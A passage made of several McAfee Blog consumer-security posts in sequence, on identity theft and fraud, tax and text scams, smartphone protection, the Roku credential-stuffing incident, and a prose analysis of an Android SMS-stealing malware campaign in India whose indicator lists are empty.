Together, with some good protection and a sharp eye, you can avoid those identity theft scams floating around on social media—and get back to enjoying time spent online with your true family and friends.
The post Quizzes and Other Identity Theft Schemes to Avoid on Social Media appeared first on McAfee Blog.
What’s the difference between identity fraud and identity theft? Well, it’s subtle, so much so that it’s easy to use them nearly interchangeably. While both can take a bite out of your wallet, they are different—and knowing the differences can help you understand what’s at stake.
Let’s start with an overview and a few examples of each.
So there’s that subtle difference we mentioned. Identity fraud involves the misuse of an existing account. Identity theft means the theft of your personal information, which is then used to impersonate you in some way, such as opening new accounts in your name.
Above and beyond those definitions and examples, a couple of real-life examples put the differences in perspective as well.
As for identity fraud, individual cases of fraud don’t always make the headlines, but that’s not to say you won’t hear about it in a couple of different ways.
The first way may be news stories about data breaches, where hackers gain things like names, emails, and payment information from companies or organizations. That info can then end up in the hands of a fraudster, who then accesses those accounts to drain funds or make purchases.
On a smaller scale, you may know someone who has had to get a new credit or debit card because theirs was compromised, perhaps by a breach or by mistakenly making a payment through an insecure website or by visiting a phony login page as part of a phishing attack. These can lead to fraud as well.
It usually starts with someone saying anything from, “That’s strange …” to “Oh, no!” There’ll be a strange charge on your credit card bill, a piece of mail from a bill collector, or a statement from an account you never opened—just to name a few things.
With that, I have a few recent blogs that help you spot all kinds of identity crime, along with advice to help keep it from happening to you in the first place:
While there are differences between identity fraud and identity theft, they do share a couple of things in common: you can take steps to prevent them, and you can take steps to limit their impact should you find yourself faced with one or the other.
The articles called out above will give you the details, yet staying safe begins with vigilance. Check on your accounts and credit reports regularly and really scrutinize what’s happening in them. Consider covering yourself with an identity monitoring solution — and act on anything that looks strange or outright fishy by reporting it to the company or institution in question.
The post How To Tell The Difference Between Identity Fraud and Identity Theft? appeared first on McAfee Blog.
When it comes to identity theft, trust your gut when something doesn’t feel right. Follow up. What you’re seeing could be a problem.
A missing bill or a mysterious charge on your credit card could be the tip of an identity theft iceberg, one that can run deep if left unaddressed. Here, we’ll look at several signs of identity theft that likely need some investigation and the steps you can take to take charge of the situation.
Unfortunately, it can happen in several ways.
In the physical world, it can happen simply because you lost your wallet or debit card. However, there are also cases where someone gets your information by going through your mail or trash for bills and statements. In other more extreme cases, theft can happen by someone successfully registering a change of address form in your name (although the U.S. Postal Service has security measures in place that make this difficult).
In the digital world, that’s where the avenues of identity theft blow wide open. It could come by way of a data breach, a thief “skimming” credit card information from a point-of-sale terminal, or by a dedicated crook piecing together various bits of personal information that have been gathered from social media, phishing attacks, or malware designed to harvest information. Additionally, thieves may eavesdrop on public Wi-Fi and steal information from people who are shopping or banking online without the security of a VPN.
Regardless of how crooks pull it off, identity theft is on the rise. According to the Federal Trade Commission (FTC), identity theft claims jumped up from roughly 650,000 claims in 2019 to 1 million in 2023. Of the reported fraud cases where a dollar loss was reported, the FTC calls out the following top three contact methods for identity theft:
However, phone calls, texts, and email remain the most preferred contact methods that fraudsters use, even if they are less successful in creating dollar losses than malicious websites, ads, and social media.
Identity thieves leave a trail. With your identity in hand, they can charge things to one or more of your existing accounts—and if they have enough information about you, they can even create entirely new accounts in your name. Either way, once an identity thief strikes, you’re probably going to notice that something is wrong. Possible signs include:
As you can see, the signs of possible identity theft can run anywhere from, “Well, that’s strange …” to “OH NO!” However, the good news is that there are several ways to check if someone is using your identity before it becomes a problem – or before it becomes a big problem that gets out of hand.
The point is that if you suspect fraud, you need to act right away. With identity theft becoming increasingly commonplace, many businesses, banks, and organizations have fraud reporting mechanisms in place that can assist you should you have any concerns. With that in mind, here are some immediate steps you can take:
Whether you spot a curious charge on your bank statement or you discover what looks like a fraudulent account when you get your free credit report, let the bank or business involved know you suspect fraud. With a visit to their website, you can track down the appropriate number to call and get the investigation process started.
Some businesses will require you to file a local police report to acquire a case number to complete your claim. Even beyond a business making such a request, filing a report is still a good idea. Identity theft is still theft and reporting it provides an official record of the incident. Should your case of identity theft lead to someone impersonating you or committing a crime in your name, filing a police report right away can help clear your name down the road. Be sure to save any evidence you have, like statements or documents that are associated with the theft. They can help clean up your record as well.
The FTC’s identity theft website is a fantastic resource should you find yourself in need. Above and beyond simply reporting the theft, the FTC can provide you with a step-by-step recovery plan—and even walk you through the process if you create an account with them. Additionally, reporting theft to the FTC can prove helpful if debtors come knocking to collect on any bogus charges in your name. You can provide them with a copy of your FTC report and ask them to stop.
You can place a free one-year fraud alert with one of the major credit bureaus (Experian, TransUnion, Equifax), and they will notify the other two. A fraud alert will make it tougher for thieves to open accounts in your name, as it requires businesses to verify your identity before issuing new credit in your name.
A credit freeze goes a step further. As the name implies, a freeze prohibits creditors from pulling your credit report, which is needed to approve credit. Such a freeze is in place until you lift it, and it will also apply to legitimate queries as well. Thus, if you intend to get a loan or new credit card while a freeze is in place, you’ll likely need to take extra measures to see that through. Contact each of the major credit bureaus (Experian, TransUnion, Equifax) to put a freeze in place or lift it when you’re ready.
This can run the gamut from closing any false accounts that were set up in your name, removing bogus charges, and correcting information in your credit report such as phony addresses or contact information. With your FTC report, you can dispute these discrepancies and have the business correct the record. Be sure to ask for written confirmation and keep a record of all documents and conversations involved.
If you receive a notice from the IRS that someone used your identity to file a tax return in your name, follow the information provided by the IRS in the notice. From there, you can file an identity theft affidavit with the IRS. If the notice mentions that you were paid by an employer you don’t know, contact that employer as well and let them know of possible fraud—namely that someone has stolen your identity and that you don’t truly work for them.
Also, be aware that the IRS has specific guidelines as to how and when they will contact you. As a rule, they will most likely contact you via physical mail delivered by the U.S. Postal Service. (They won’t call or apply harassing pressure tactics—only scammers do that.) Identity-based tax scams are a topic all of their own, and for more on it, you can check out this article on tax scams and how to avoid them.
Another downside of identity theft is that it can mark the start of a long, drawn-out affair. One instance of theft can possibly lead to another, so even what may appear to be an isolated bad charge on your credit card calls for keeping an eye on your identity. Many of the tools you would use up to this point still apply, such as checking up on your credit reports, maintaining fraud alerts as needed, and reviewing your accounts closely.
With all the time we spend online as we bank, shop, and simply surf, we create and share all kinds of personal information—information that can get collected and even stolen. The good news is that you can prevent theft and fraud with online protection software, such as McAfee+ Ultimate.
With McAfee+ Ultimate you can:
In all, it’s our most comprehensive privacy, identity, and device protection plan, built for a time when we rely so heavily on the internet to go about our day, whether that’s work, play, or simply getting things done.
Realizing that you’ve become a victim of identity theft carries plenty of emotion with it, which is understandable—the thief has stolen a part of you to get at your money, information, and even reputation. Once that initial rush of anger and surprise has passed, it’s time to get clinical and get busy. Think like a detective who’s building – and closing – a case. That’s exactly what you’re doing. Follow the steps, document each one, and build up your case file as you need. Staying cool, organized, and ready with an answer to any questions you’ll face in the process of restoring your identity will help you see things through.
Once again, this is a good reminder that vigilance is the best defense against identity theft from happening in the first place. While there’s no absolute, sure-fire protection against it, there are several things you can do to lower the odds in your favor. And at the top of the list is keeping consistent tabs on what’s happening across your credit reports and accounts.
The post How to Detect Signs of Identity Theft appeared first on McAfee Blog.
Can thieves steal identities with only a name and address?
In short, the answer is “no.” Which is a good thing, as your name and address are in fact part of the public record. Anyone can get a hold of them. However, because they are public information, they are still tools that identity thieves can use.
If you think of your identity as a jigsaw puzzle, your name and address are the first two pieces that they can use to build a bigger picture and ultimately put your identity at risk.
With that, let’s look at some other key pieces of your identity that are associated with your name and address—and what you can do to protect them.
For starters, this information is so general that it is of little value in and of itself to an identity thief. Yet a determined identity thief can do a bit of legwork and take a few extra steps to use them as a springboard for other scams.
For example, with your name and address a thief could:
There are volumes of public information that are readily available should someone want to add some more pieces to your identity jigsaw puzzle, such as:
In the U.S., the availability of such information will vary from state to state and different levels of government may have different regulations about what information gets filed—in addition to whether and how those reports are made public. Globally, different nations and regions will collect varying amounts of public information and have their own regulations in place as well. More broadly, though, many of these public databases are now online. Consequently, accessing them is easier than the days when getting a hold of that information required an in-person visit to a library or public office.
Cybercriminals can gain additional information about you from other online sources, such as data brokers. And data brokerage is a big business, a global economy estimated at $280 billion U.S. dollars a year. What fuels it? Personal information, representing thousands of data points on billions of people scraped from public records, social media, smartphone apps, shopper loyalty cards, third-party sources, and sometimes other data broker sites as well.
The above-the-board legal intent of data broker sites is to sell that information to advertisers so that they can create highly targeted campaigns based on people’s behaviors, travels, interests, and even political leanings. Others such as law enforcement officials, journalists, and others who are conducting background checks will use them too.
On the dark side, hackers, scammers, and thieves will buy this information as well, which they can use to commit identity theft and fraud. The thing is, data brokers will sell to anyone. They don’t discriminate.
Phishing attacks aren’t just for email, texts, and direct messages. In fact, thieves are turning to old tricks via old-fashioned physical mail. That includes sending phony offers or impersonating officials of government institutions, all designed to trick you into giving up your personally identifiable information (PII).
What might that look like in your mailbox? They can take the form of bogus lottery prizes that request bank information for routing (non-existent) winnings. Another favorite of scammers is bogus tax notifications that demand immediate payment. In all, many can look quite convincing at first blush, yet there are ready ways you can spot them. In fact, many of the tips for avoiding these physical mail phishing attacks are the same for avoiding phishing attacks online.
Recently, I’ve seen a few news stories like this where thieves reportedly abuse the change-of-address system with the U.S. Postal Service. Thieves will simply forward your mail to an address of their choosing, which can drop sensitive information like bank and credit card statements in their mailbox. From there, they could potentially have new checks sent to them or perhaps an additional credit card—both of which they can use to drain your accounts and run up your bills.
The Postal Service has mechanisms in place to prevent this, however. Among these, the Postal Service will send you a physical piece of mail to confirm the forwarding. So, if you ever receive mail from the Postal Service, open it and give it a close look. If you get such a notice and didn’t order the forwarding, visit your local post office to get things straightened out. Likewise, if it seems like you’re missing bills in the mail, that’s another good reason to follow up with your post office and the business in question to see if there have been any changes made in your mail forwarding.
So while your name and address are out there for practically all to see, they’re largely of little value to an identity thief on their own. But as mentioned above, they are key puzzle pieces to your overall identity. With enough of those other pieces in hand, that’s where an identity thief can cause trouble.
Other crucial pieces of your identity include:
Let’s start with the biggest one. This is the master key to your identity, as it is one of the most unique identifiers you have. As I covered in my earlier blog on Social Security fraud, a thief can unlock everything from credit history and credit line to tax refunds and medical care with your Social Security or tax ID number. In extreme cases, they can use it to impersonate you for employment, healthcare, and even in the event of an arrest.
You can protect your Social Security Number by keeping it locked in a safe place (rather than in your wallet) and by providing your number only when absolutely necessary. For more tips on keeping your number safe, drop by that blog on Social Security fraud I mentioned.
Thieves have figured out ways of getting around the fact that IDs like these include a photo. They may be able to modify or emulate these documents “well enough” to pull off certain types of fraud, particularly if the people requesting their bogus documents don’t review them with a critical eye.
Protecting yourself in this case means knowing where these documents are at any time. (With passports, you may want to store those securely like your Social Security or tax ID number.) Also be careful when you share this information, as the identifiers on these documents are highly unique. If you’re uncomfortable with sharing this information, you can ask if other forms of ID might work—or if this information is really needed at all. Also, take a moment to make copies of these documents and store them in a secure place. This can help you provide important info to the proper authorities if they’re lost or stolen.
With data breaches large and small making the news (and many more that do not), keeping a sharp eye on your accounts is a major part of identity theft prevention. We talk about this topic quite often, and it’s worth another mention because protecting these means protecting yourself from thieves who are after direct access to your finances and more.
Secure your digital accounts for banking, credit cards, financials, and shopping by using strong, unique passwords for each of your accounts that you change every 60 days. Sound like a lot of work? Let a password manager do it for you, which you can find in comprehensive online protection software. By changing your strong passwords and keeping them unique can help prevent you from becoming a victim if your account information is part of a breach—by the time a crook attempts to use it, you may have changed it and made it out of date.
In addition to protecting the core forms of identity mentioned above, a few other good habits go a long way toward keeping your identity secure.
By protecting your devices, you protect what’s on them, like your personal information. Comprehensive online protection software can protect your identity in several ways, like creating and managing the strong, unique passwords we talked about and providing further services that monitor and protect your identity—in addition to digital shredders that can permanently remove sensitive documents (simply deleting them won’t do that alone.) Further, it can monitor your identity and monitor your credit, further protecting you from theft and fraud.
Identity theft where thieves dig through trash or go “dumpster diving” for literal scraps of personal info in bills and statements, has been an issue for some time. You can prevent it by shredding up any paper medical bills, tax documents, and checks once you’re through with them. Paper shredders are inexpensive, and let’s face it, kind of fun too. Also, if you’re traveling, have a trusted someone collect your mail or have the post office put a temporary hold on your mail. Thieves still poach mail from mailboxes too.
Getting statements online cuts the paper out of the equation and thus removes another thing that a thief can physically steal and possibly use against you. Whether you use electronic statements through your bank, credit card company, medical provider, or insurance company, use a secure password and a secure connection provided by a VPN. Both will make theft of your personal info far tougher on identity thieves.
A VPN is a Virtual Private Network, a service that protects your data and privacy online. It creates an encrypted tunnel to keep you more anonymous online by masking your IP address, device information, and the data you’re passing along that connection. In this way, it makes it far more difficult for advertisers, data brokers, and bad actors to skim your private information—in addition to shielding your information from crooks and snoops while you’re banking, shopping, or handling any kind of sensitive information online.
Give your statements a close look each time they come around. While many companies and institutions have fraud detection mechanisms in place, they don’t always catch every instance of fraud. Look out for strange purchases or charges and follow up with your bank or credit card company if you suspect fraud. Even the smallest charge could be a sign that something shady is afoot.
This is a powerful tool for spotting identity theft. And in many cases, it’s free to do so. In the U.S., the Fair Credit Reporting Act (FCRA) requires the major credit agencies to provide you with a free credit check at least once every 12 months. Canada provides this service, and the UK has options to receive free reports as well, along with several other nations. It’s a great idea to check your credit report, even if you don’t suspect a problem.
If the thought of your personal info being bought and sold puts you off, there’s something you can do about it. Our Personal Data Cleanup service can scan some of the riskiest data broker sites and show you which ones are selling your personal info. It also provides guidance on how you can remove your data from those sites, and with select products, it can even manage the removal for you.
While thieves need more than just your name and address to commit the overwhelming majority of fraud, your name and address are centerpieces of the larger jigsaw puzzle that is your overall identity.
And the interesting thing is your puzzle gets larger and larger as time goes on. With each new account you create and service that you sign into, that’s one more piece added to the puzzle. Thieves love getting their hands on any pieces they can because with enough of them in place, they can try and pull a fast one in your name. By looking after each piece and knowing what your larger jigsaw puzzle looks like, you can help keep identity thieves out of your business and your life.
The post Can Thieves Steal Identities With Only a Name and Address? appeared first on McAfee Blog.
Elder scams cost seniors in the U.S. some $3 billion annually. And tax season adds a healthy sum to that appalling figure.
What makes seniors such a prime target for tax scams? The Federal Bureau of Investigation (FBI) states several factors. For one, elders are typically trusting and polite. Additionally, many own their own home, have some manner of savings, and enjoy the benefits of good credit—all of which make for an ideal victim profile.
Also according to the FBI, elders may be less able or willing to report being scammed because they may not know the exact way in which they were scammed, or they may feel a sense of shame over it, or even some combination of the two. Moreover, being scammed may instill fear that family members will lose confidence in their ability to look after their own affairs.
If there’s one thing that we can do for our elders, it’s help them raise their critical hackles so they can spot these scams and stop them in their tracks, particularly around tax time. With that, let’s see how crooks target elders, what those scams look and feel like, along with the things we can do to keep ourselves and our loved ones from getting stung.
The phone rings, and an assertive voice admonishes an elder for non-payment of taxes. The readout on the caller ID shows “Internal Revenue Service” or “IRS,” the person cites an IRS badge number, and the victim is told to pay now via a wire transfer or prepaid gift card. The caller even knows the last four digits of their Social Security Number (SSN). This is a scam.
The caller, and the claim of non-payment, are 100 percent bogus. Even with those last four digits of the SSN attempting to add credibility, it’s still bogus. (Chances are, those last four digits were compromised elsewhere and ended up in the hands of the thieves by way of the black market or dark web so that they could use them in scams just like these.)
Some IRS imposter scams take it a step further. Fraudsters will threaten victims with arrest, deportation, or other legal action, like a lien on funds or the suspension of a driver’s license. They’ll make repeated calls as well, sometimes with additional imposters posing as law enforcement as a means of intimidating elders into payment.
The IRS will never threaten you or someone you know in such a way.
In fact, the IRS will never call you to demand payment. Nor will the IRS ever ask you to wire funds or pay with a gift card or prepaid debit card. And if the IRS claims you do owe funds, you will be notified of your rights as a taxpayer and be given the opportunity to make an appeal. If there’s any question about making payments to the IRS, the IRS has specific guidelines as to how to make a payment properly and safely on their official website.
It’s also helpful to know what the IRS will do in the event you owe taxes. In fact, they have an entire page that spells out how to know it’s really the IRS calling or knocking at your door. It’s a quick read and a worthwhile one at that.
In all, the IRS will contact you by mail or in person. Should you get one of these calls, hang up. Then, report it. I’ll include a list of ways you can file a report at the end of the article.
Whether it’s a disembodied voice generated by a computer or a scripted message that’s been recorded by a person, robocalls provide scammers with another favorite avenue of attack. The approach is often quite like the phone scam outlined above, albeit less personalized because the attack is a canned robocall. However, robocalls allow crooks to cast a much larger net in the hopes of illegally wresting money away from victims. In effect, they can spam hundreds or thousands of people with one message in the hopes of landing a bite.
While perhaps not as personalized as other imposter scams, they can still create that innate sense of unease of being contacted by the IRS and harangue a victim into dialing a phony call center where they are further pressured into paying by wire or with a prepaid card, just like in other imposter scams. As above, your course of action here is to simply hang up and report it.
Here’s another popular attack. An elder gets an unsolicited email from what appears to be the IRS, yet isn’t. The phony email asks them to update or verify their personal or financial information for a payment or refund. The email may also contain an attachment which they are instructed to click and open. Again, all of these are scams.
Going back to what we talked about earlier, that’s not how the IRS will contact you. These are phishing attacks aimed at grifting prized personal and financial information that scammers can use to commit acts of theft or embezzlement. In the case of the attachment, it very well may contain malware that can do further harm to their device, finances, or personal information.
If you receive one of these emails, don’t open it. And certainly don’t open any attachments—which holds true for any unsolicited email you receive with an attachment.
Beyond simply knowing how to spot a possible attack, you can do several things to prevent one from happening in the first place.
First let’s start with some good, old-fashioned physical security. You may also want to look into purchasing a locking mailbox. Mail and porch theft are still prevalent, and it’s not uncommon for thieves to harvest personal and financial information by simply lifting it from your mailbox.
Another cornerstone of physical security is shredding paper correspondence that contains personal or financial information, such as bills, medical documents, bank statements and so forth. I suggest investing a few dollars on an actual paper shredder, which are typically inexpensive if you look for a home model. If you have sensitive paper documents in bulk, such as old tax records that you no longer need to save, consider calling upon a professional service that can drive up to your home and do that high volume of shredding for you.
Likewise, consider the physical security of your digital devices. Make sure you lock your smartphones, tablets, and computers with a PIN or password. Losing a device is a terrible strain enough, let alone knowing that the personal and financial information on them could end up in the hands of a crook. Also see if tracking is available on your device. That way, enabling device tracking can help you locate a lost or stolen item.
There are plenty of things you can do to protect yourself on the digital front too. Step one is installing comprehensive security software on your devices. This will safeguard you in several ways, such as email filters that will protect you from phishing attacks, features that will warn you of sketchy links and downloads, plus further protection for your identity and privacy—in addition to overall protection from viruses, malware, and other cyberattacks.
Additional features in comprehensive security software that can protect you from tax scams include:
And here’s one item that certainly bears mentioning: dispose of your old technology securely. What’s on that old hard drive of yours? That old computer may contain loads of precious personal and financial info on it. Look into the e-waste disposal options in your community. There are services that will dispose of and recycle old technology while doing it in a secure manner so the data and info on your device doesn’t see the light of day again.
As said earlier, don’t let a bad deed go unreported. The IRS offers the following avenues of communication to report scams.
In all, learning to recognize the scams that crooks aim at elders and putting some strong security measures in place can help prevent these crimes from happening to you or a loved one. Take a moment to act. It’s vital, because your personal information has a hefty price tag associated with it—both at tax time and any time.
The post How to Spot, and Prevent, the Tax Scams That Target Elders appeared first on McAfee Blog.
Authored by ZePeng Chen and Wenfeng Yu
McAfee Mobile Research Team has observed an active scam malware campaign targeting Android users in India. This malware has gone through three stages. The first one is the development stage, from March 2023 to July 2023, during which a couple of applications were created each month. The second is the expansion stage, from August 2023 to October 2023, during which dozens of applications were created each month. The third is the active stage, from September 2023 to the present, during which hundreds of applications were created each month. According to McAfee’s detection telemetry data, this malware has accumulated over 800 applications and has infected more than 3,700 Android devices. The campaign is still ongoing, and the number of infected devices will continue to rise.
Malware developers create phishing pages for scenarios that are easy to deceive, such as electricity bill payments, hospital appointments, and courier package bookings. Developers use different applications to load different phishing pages, which are eventually sold to scammers. In our research, more than 100 unique phishing URLs and more than 100 unique C2 URLs are created in these malicious applications. It means that each scammer can carry out scam activities independently.
Scammers use malware to attack victims. They typically contact victims via phone, text, email, or social applications to inform them that they need to reschedule services. This kind of fraud attack is a typical and effective fraud method. As a result, victims are asked to download a specific app, and submit personal information. There was a report where an Indian woman downloaded malware from a link in WhatsApp and about ₹98,000 was stolen from her. We were not able to confirm if is the same malware, but it is just one example of how these malicious applications can be distributed directly via WhatsApp.
The attack scenario appears credible, many victims do not doubt the scammers’ intentions. Following the instructions provided, they download and installed the app. In the app, victims are induced to submit sensitive information such as personal phone numbers, addresses, bank card numbers, and passwords. Once this information falls into the hands of scammers, they can easily steal funds from the victim’s bank account.
The malware not only steals victims’ bank account information via phishing web pages but also steals SMS messages on victims’ devices. Because of the stolen information, even if the bank account supports OTP authentication, the scammer can transfer all the funds. The malware uses legitimate platforms to deploy phishing pages to make it appear more trustworthy to evade detection.
McAfee Mobile Security detects this threat as Android/SmsSpy. For more information, and to get fully protected, visit McAfee Mobile Security.
We discovered that these phishing pages and malware were being sold as a service by a cyber group named ELVIA INFOTECH. A distinct difference between this malware and others is that the apps sold have a valid expiration date. When the expiration date is reached, some application links will redirect to a payment notification page. The notification is clearly to request the purchaser to pay a fee to restore the use of the malware.
Figure 1. Payment notification.
We also discovered that the cybercriminal group was selling malware in a Telegram group. Based on these observations, we believe that ELVIA INFOTECH is a professional cybercriminal organization engaged in the development, maintenance, and sale of malware and phishing websites.
Figure 2. Telegram Group conversation.
This malware has been maintained and recently updated, and hundreds of malicious applications were created. They like to use the file names such as “CustomerSupport.apk”, “Mahavitaran Bill Update.apk”, “Appointment Booking.apk”, “Hospital Support.apk”, “Emergency Courier.apk” and the application names such as “Customer Support”, “Blue Dart”, “Hospital Support”,” Emergency Courier” to trick victims, below are some applications’ names and icons.
Figure 3. Some applications’ names and icons
Not only do they pretend to be “Customer Support”, but they also pretend to be popular courier companies like “Blue Dart” in India, but they also target utility companies like “Mahavitaran” (Power Corporation of India).
Once victims click the fake icon, the application will be launched and start to attack victims.
1. Loading Phishing Pages
The phishing page loads once the application is launched. It will disguise itself as a page of various legitimate services, making victims believe that they are visiting a legitimate service website. Here, victims are tricked into providing sensitive information such as name, address, phone number, bank card number, and password. However, once submitted, this information falls into the hands of scammers, allowing them to easily access and control the victim’s bank account.
We found that most of this attack campaign impersonated carrier package delivery companies.
Figure 4. Phishing Pages Load Once App Launches
The malware developers also designed different phishing pages for different applications to deceive victims in different scenarios that exploit electricity bill payments and hospital appointments.
Figure 5. Hospital appointment and Electricity Bill Phishing Pages
2. Stealing One-Time Passwords via SMS message
As a core design of this malware, the application requests permissions to allow it to send and view SMS messages once it launches.
Figure 6. Request SMS permissions.
If victims click the “Allow” button, the malware starts a background service that secretly monitors users’ text messages and forwards them to a number which is from C2 server.
Figure 7. Forward phone number from C2 server
This step is crucial for the scam process, as many banks send a one-time password (OTP) to the customer’s phone for transaction verification. Using this method, the scammers can obtain these OTPs and successfully complete bank transactions.
This malicious app and the developers behind it have emerged rapidly in India from last year to now, purposefully developing and maintaining malware, and focusing on deploying well-designed phishing websites through legitimate platforms. The group secretly promotes and sells its malware through social media platforms, making the spread of the malware more subtle and difficult to detect. This tactic resulted in an even more severe malware outbreak, posing an ongoing and serious threat to the financial security of Indian users.
Malware campaigns are very persistent and using multiple different applications on different websites can trick many victims into installing these applications and providing their private and personal information, which can then be used to commit fraud. In this environment, ordinary users in India face huge cybersecurity challenges. Therefore, users need to remain vigilant and cautious when dealing with any electronic communications or application download requests that appear legitimate but may contain malware. We strongly recommend users install security software on their devices and always keep it up to date. By using McAfee Mobile Security products, users can further protect their devices and reduce the risks associated with this type of malware, providing a more secure experience.
Indicators of Compromise (IOCs)
SHA256 hash List:
Phishing URLs:
C2 Server URLs:
The post Android Phishing Scam Using Malware-as-a-Service on the Rise in India appeared first on McAfee Blog.
There’s little rest for your hard-working smartphone. If you’re like many professionals today, you use it for work, play, and a mix of personal business in between. Now, what if something went wrong with that phone, like loss or theft? Worse yet, what if your smartphone got hacked? Let’s try and keep that from happening to you.
Globally, plenty of people pull double duty with their smartphones. In Spain, one survey found that 55% of people use the same phone for a mix of personal and and work activity. The same survey showed that up to half of people interviewed in Japan, Australia, and the U.S. do so as well, while nations like the UK and Germany trailed at 31% and 23% respectively.
Whether these figures trend on the low or high end, the security implications remain constant. A smartphone loaded with business and personal data makes for a desirable target. Hackers target smartphones because they’re often unprotected, which gives hackers an easy “in” to your personal information and to any corporate networks you may use. It’s like two hacks with one stone.
Put simply, as a working professional with a smartphone, you’re a high-value target.
As both a parent and a professional, I put together a few things you can do to protect your smartphone from hacks so that you can keep your personal and work life safe:
First up, the basics. Locking your phone with facial ID, a fingerprint, pattern or a pin is your most basic form of protection, particularly in the event of loss or theft. (Your options will vary depending on the device, operating system, and manufacturer.) Take it a step further for even more protection. Secure the accounts on your phone with strong passwords and use two-factor authentication on the apps that offer it, which doubles your line of defense.
Or, put another way, don’t hop onto public Wi-Fi networks without protection. A VPN masks your connection from hackers allowing you to connect privately when you are on unsecure public networks at airports, cafes, hotels, and the like. With a VPN connection, you’ll know that your sensitive data, documents, and activities you do are protected from snooping, which is definitely a great feeling given the amount of personal and professional business we manage with our smartphones.
Both Google Play and Apple’s App Store have measures in place to help prevent potentially dangerous apps from making it into their stores. Malicious apps are often found outside of the app stores, which can run in the background and compromise your personal data like passwords, credit card numbers, and more—practically everything that you keep on your phone. Further, when you are in the app stores, look closely at the descriptions and reviews for apps before you download them. Malicious apps and counterfeits can still find their way into stores, and here are a few ways you can keep those bad apps from getting onto your phone.
Backing up your phone is always a good idea for two reasons:
Both iPhones and Android phones have straightforward ways of backing up your phone regularly.
Worst case scenario—your phone is gone. Really gone. Either it’s hopelessly lost or got stolen. What now? Lock it remotely or even wipe its data entirely. While that last bit about wiping the phone seems like a drastic move, if you maintain regular backups as mentioned above, your data is secure in the cloud—ready for you to restore. In all, this means that hackers won’t be able to access you, or your company’s, sensitive information—which can keep you out of trouble and your professional business safe. Apple provides iOS users with a step-by-step guide for remotely wiping devices, and Google offers up a guide for Android users as well.
We all download apps, use them once, and then forget they are on our phone. Take a few moments to swipe through your screen and see which ones you’re truly done with and delete them along with their data. Some apps have an account associated with them that may store data off your phone as well. Take the extra step and delete those accounts so any off-phone data is deleted.
The reason for this is that every extra app is another app that needs updating or that may have a security issue associated with it. In a time of data breaches and vulnerabilities, deleting old apps is a smart move. As for the ones you keep, update them regularly and turn on auto-updates if that’s an option. Updates not only introduce new features to apps, but they also often address security issues too.
With so much of your life on your phone, getting security software installed on it can protect you and the things you keep on your phone. Whether you’re an Android owner or iOS owner, mobile security software can keep your data, your shopping, and payments secure.
The post 7 Tips to Protect Your Smartphone from Getting Hacked appeared first on McAfee Blog.
Hackers used one of the oldest tricks in the book to turn a buck. All at the expense of several thousand Roku users.
Roku notified users that “certain individual Roku accounts” might have been accessed by someone other than their owners. The method of attack involved … credential stuffing, where stolen passwords from one account are “stuffed” into other accounts. With this form of attack, a reused password in one account can give access to several others.
Roku discovered that was the likely cause here, affecting at least 15,000 users.[i]
“Through our investigation, we determined that unauthorized actors had likely obtained certain usernames and passwords of consumers from third-party sources (e.g., through data breaches of third-party services that are not related to Roku).”
So while Roku itself wasn’t breached, hackers used info from other data breaches to break into these accounts, which were sold online. Reportedly for as little as fifty cents each.
With access to the compromised accounts, thieves tried to purchase subscriptions and hardware using stored payment options.
Roku went on to say that these unauthorized actors didn’t get access to “social security numbers, full payment account numbers, dates of birth, or other similar sensitive personal information requiring notification.”
The company said it continues to monitor accounts for unusual activity and that it’s working with subscribers to refund any unauthorized charges.
It has also reset passwords for potentially affected account holders. The company directed users to visit my.roku.com and use the “Forgot password?” option on the sign-in page.
While an estimated 15,000-plus compromised accounts have been identified, the possibility remains that yet more might be at risk as well. Every Roku subscriber should check their account for unusual activity. From there, we suggest updating your password to a new password that’s both strong and unique.
With that, we recommend that you take the following steps, which can help prevent and halt any harm being done with your personal info.
With some personal info in hand, bad actors might seek out more. They might follow up a breach with rounds of phishing attacks that direct you to bogus sites designed to steal your personal info — either by tricking you into providing it or by stealing it without your knowledge. So look out for phishing attacks, particularly after breaches.
If you are contacted by a company, make certain the communication is legitimate. Bad actors might pose as them to steal personal info. Don’t click or tap on links sent in emails, texts, or messages. Instead, go straight to the appropriate website or contact them by phone directly.
In this case, head to my.roku.com and use the “Forgot password?” option as the company suggests.
Changing passwords now is a must. Strong and unique passwords are best, which means never reusing your passwords across different sites and platforms. Using a password manager helps you keep on top of it all, while also storing your passwords securely. Moreover, changing your passwords regularly might make a stolen password worthless because it’s out of date.
While a strong and unique password is a good first line of defense, enabling two-factor authentication across your accounts helps your cause by providing an added layer of security. It’s increasingly common to see nowadays, where banks and all manner of online services will only allow access to your accounts after you’ve provided a one-time passcode sent to your email or smartphone. If your accounts support two-factor authentication, enable it.
Unfortunately at this time, Roku users don’t have this option available to them (although Roku does offer it for its smart home app).
An identity monitoring service can monitor everything from email addresses to IDs and phone numbers for signs of breaches so you can take action to secure your accounts before they’re used for identity theft. Personal info harvested from data breaches can end up on dark web marketplaces where other bad actors buy it for their own attacks. Ours monitors the dark web for your personal info and provides early alerts if your data is found on there, an average of 10 months ahead of similar services. We also provide guidance to help you act if your info is found.
In the case of the Roku attack, the account thieves purchased compromised accounts on dark web marketplaces. Identity monitoring can help you spot that kind of activity, which then lets you know it’s time to change your passwords.
Although Roku said it found no evidence that account thieves gained access to further sensitive info, treat your info like it was anyway. Strongly consider taking preventive measures now. Checking your credit and getting identity theft protection can help keep you safe in the wake of a breach. Further, a security freeze can help prevent identity theft if you spot any unusual activity. You can get all three in place with our McAfee+ Advanced or Ultimate plans. Features include:
A complete suite of online protection software can offer layers of extra security. In addition to more private and secure time online with a VPN, identity monitoring, and password management, it includes web browser protection that can block malicious and suspicious links that might lead you down the road to malware or a phishing scam — which antivirus protection can’t do alone. Additionally, we offer support from a licensed recovery pro who can help you restore your credit, just in case.
[i] https://apps.web.maine.gov/online/aeviewer/ME/40/e9cc298b-379b-47ba-a10d-e2263963b574.shtml
The post 15,000+ Roku Accounts Compromised — Take These Steps to Protect Yourself appeared first on McAfee Blog.
According to reports from the Federal Trade Commission’s Consumer Sentinel database, text message scams swindled $330 million from Americans in 2022 alone. The staggering figure highlights a growing concern for consumers globally, who increasingly interact with brands and service providers via text, email, and even social media. As our reliance on technology continues, it is important for everyone to understand how to spot scam texts amid the real messages they receive. amid the real messages they receive.
With such frequent communication from brands and organizations, you can be hard-pressed to figure out what is a scam or not. This practical and actionable advice may be able to help you spot the imposters and protect yourself against even the most hard-to-identify scam messages.
Most of us probably avoid reading disclaimers and terms of service from brands and organizations. Paying attention to guidelines for how an organization will contact you will help you stay safe from scams. Just take it from entertainment host, Andy Cohen.
